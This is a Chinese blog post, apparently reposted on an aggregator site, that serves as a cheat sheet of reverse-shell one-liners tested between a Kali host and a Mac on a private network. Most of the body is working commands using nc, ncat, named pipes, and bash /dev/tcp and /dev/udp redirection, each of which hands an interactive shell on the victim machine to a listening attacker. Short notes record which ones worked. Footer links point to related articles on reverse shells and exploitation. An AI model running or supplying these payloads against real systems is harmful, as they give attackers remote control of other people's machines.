kali /mac 成功的反弹shell语句

这篇具有很好参考价值的文章主要介绍了kali /mac 成功的反弹shell语句。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

mac :192.168.19.107 kali:192.168.19.111

kali 监听mac : nc -lvvp 6666

mac执行:

1:

mknod backpipe p && nc 192.168.19.111 6666 0<backpipe | /bin/bash 1>backpipe 

2:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.19.111 6666 >/tmp/f

3:

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.19.111 6666 0/tmp/p 2>&1

该语句在监听机器上执行的语句会同步到被攻击机上

kali /mac 成功的反弹shell语句,macos4:

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.19.111 6666 > f

5:

ncat 192.168.19.111 6666 -e /bin/bash

mac监听kali的反弹shell:

mac : ncat -lvvp 3333

kali:

1:

bash -i >& /dev/tcp/192.168.19.107/3333 0>&1

2: 这条命令使用,kali 上执行的命令结果会在mac机器上显示出来,mac无法执行命令,kali上执行命令无结果,结果在mac上显示

/bin/bash -i > /dev/tcp/192.168.19.107/3333 0<& 2>&1

3: 命令执行成功,能反弹成功,但是输入命令无显示,不会用

exec 5<>/dev/tcp/192.168.19.107/3333;cat <&5 | while read line; do  2>&5 >&5; done

4. 攻击机可以使用命令

exec /bin/sh 0</dev/tcp/192.168.19.107/3333 1>&0 2>&0

5:

0<&196;exec 196<>/dev/tcp/192.168.19.107/3333; sh <&196 >&196 2>&196

6:

0<&196;exec 196<>/dev/tcp/192.168.19.107/3333; sh <&196 >&196 2>&196

7:

攻击机mac 执行 ncat -u -lvp 3333

受害者执行:sh -i >& /dev/udp/192.168.19.107/3333 0>&1

8: 这个命令,在攻击机上执行,如果有报错会显示在受害者机器上,,攻击机上不显示报错语句

nc -e /bin/sh 192.168.19.107 3333

9: 报错同上

nc -e /bin/bash 192.168.19.107 3333

10:

nc -c bash 192.168.19.107 3333

11:

mknod backpipe p && nc 192.168.19.107 3333 0<backpipe | /bin/bash 1>backpipe 

12:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.19.107 3333 >/tmp/f

13:这条命令是同步两边执行的命令,不会显示结果。只记录命令

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.19.107 3333 0/tmp/p 2>&1

14: 这条命令在攻击机上报错也不会同步到受害者机器上

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.19.107 3333 > f

15:

rm -f x; mknod x p && nc 192.168.19.107 3333 0<x | /bin/bash 1>x文章来源地址https://www.toymoban.com/news/detail-855213.html

到了这里,关于kali /mac 成功的反弹shell语句的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 交互式shell与非交互式shell,反弹shell

    交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是因为shell与用户进行交互。 这种模式也是大多数用户非常熟悉的:登录、执行一些命令、签退。当签退后,shell也终止了。 需要进行信息交互,例如输入某个信息 会返回信息 你需要对其输

    2024年02月02日
    浏览(53)
  • 入侵检测——如何实现反弹shell检测?

    反弹shell的本质:就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 反弹shell的结果:一个client上的bash进程 可以和 server上的进程通信。

    2024年02月13日
    浏览(45)
  • Windows的几种常用反弹shell方法

    简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互

    2024年02月12日
    浏览(45)
  • 漏洞复现 || Hadoop未授权访问反弹Shell漏洞

    技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或

    2024年02月16日
    浏览(45)
  • 通过python获取靶机的反弹Shell [靶机实战]

    Kali:172.30.1.3/24 靶机(Funbox9):172.30.1.129/24 通过nmap扫描此主机,我们需要获取到开放的端口以及服务的Banner  通过扫描我们发现,目标主机开放着21端口,服务Banner是 vsftpd 2.3.4,并且允许匿名登录 我们尝试ftp匿名连接此主机:  根据其返回信息,我们发现了一个可能是一个本

    2024年02月06日
    浏览(37)
  • 通过nc获取靶机的反弹Shell [靶机实战]

    Kali:172.30.1.3/24 靶机(Funbox9):172.30.1.129/24 通过nmap扫描此主机,我们需要获取到开放的端口以及服务的Banner  通过扫描我们发现,目标主机开放着21端口,服务Banner是 vsftpd 2.3.4,并且允许匿名登录 我们尝试ftp匿名连接此主机:  根据其返回信息,我们发现了一个可能是一个本

    2024年02月06日
    浏览(97)
  • 【安全知识】——LInux的shell反弹姿势合集(更新中)

    作者名:白昼安全 主页面链接: 主页传送门 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: web安全,后渗透技术 每日鸡汤:  宇宙有宇宙的规律,我也有我的坚持 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况

    2024年02月05日
    浏览(34)
  • 持久化反弹一个能使用方向键的shell

    服务端 被控端 提升到pty 进一步提升可以使用tab,方向键,ctrl+c SEGINT等 服务端 被控端 参考:https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

    2024年02月15日
    浏览(43)
  • web安全学习笔记【05】——反弹Shell、正反向连接

    思维导图 #知识点: 1、Web常规-系统中间件数据库源码等 2、Web其他-前后端软件Docker分配站等 3、Web拓展-CDNWAFOSS反向负载均衡等 ----------------------------------- 1、APP架构-封装原生态H5flutter等 2、小程序架构-WebH5JSVUE框架等 ----------------------------------- 1、渗透命令-常规命令文件上传

    2024年01月25日
    浏览(32)
  • FastJson远程代码执行漏洞基于JNDI反弹shell使用

    目录 基础知识: 漏洞利用的两种方式: 靶场环境说明 反弹shell准备 反弹shell执行 在FastJson组件1.2.24及之前版本存在远程代码执行漏洞(CVE-2017-18349)。 Fastjson是阿里巴巴公司开发的一个Java语言编写的高性能的JSON处理器。它采用一种“假定有序快速匹配”的算法,号称是目前

    2023年04月15日
    浏览(28)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包